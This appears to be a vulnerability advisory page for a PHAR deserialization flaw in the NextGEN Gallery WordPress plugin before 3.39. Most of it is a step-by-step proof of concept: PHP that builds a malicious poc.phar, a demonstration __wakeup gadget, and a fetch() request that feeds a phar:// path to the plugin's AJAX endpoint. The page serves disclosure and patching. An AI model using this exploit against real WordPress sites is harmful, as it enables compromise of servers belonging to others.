NextGEN Gallery < 3.39 - Admin+ PHAR Deserialization

2023-09-2500:00:00

Linwz from DEVCORE

wordpress

admin

phar deserialization

vulnerability

0.001 Low

EPSS

Percentile

36.5%

JSON

Description The plugin is vulnerable to PHAR Deserialization due to a lack of input parameter validation in the gallery_edit function, allowing an attacker to access arbitrary resources on the server.

1. Ensure your WordPress installation is using PHP version 7.4 or earlier.
2. Create a Gallery and note its ID.
3. Create a `poc.phar` file using the following code, and add it to the root directory of the server:

<?php

class Evil {}

try
{
    $pharFile = 'poc.phar';

    if (file_exists($pharFile))
    {
        unlink($pharFile);
    }

    $phar = new Phar($pharFile);

    $phar->startBuffering();
        $phar->addFromString( 'test.txt', 'text' );
        $phar->setStub( '<?php __HALT_COMPILER(); ?>' );
        $phar->setMetadata( new Evil() );
    $phar->stopBuffering();

    echo "$pharFile successfully created" . PHP_EOL;
}
catch (Exception $e)
{
    echo $e->getMessage();
}


4. Add the following code to the server to simulate a gadget:

class Evil {
 function __wakeup() {
  die('Arbitrary deserialization');
 }
}


5. Run the following code in your browser to see the deserialization occur, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly.

await (await fetch("/index.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
    },
    "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"image_list":[{"action":"upload","data_key":"a","filename":"xxxxxxx.jpg"}]}}]&extra_data={"a":{"tmp_name":"phar://poc.phar/tmp.png"}}',
    "method": "POST",
    "mode": "cors"
})).text();

0.001 Low

EPSS

Percentile

36.5%

JSON

Related for WPEX-ID:ED099489-1DB4-4B42-9F72-77DE39C9E01E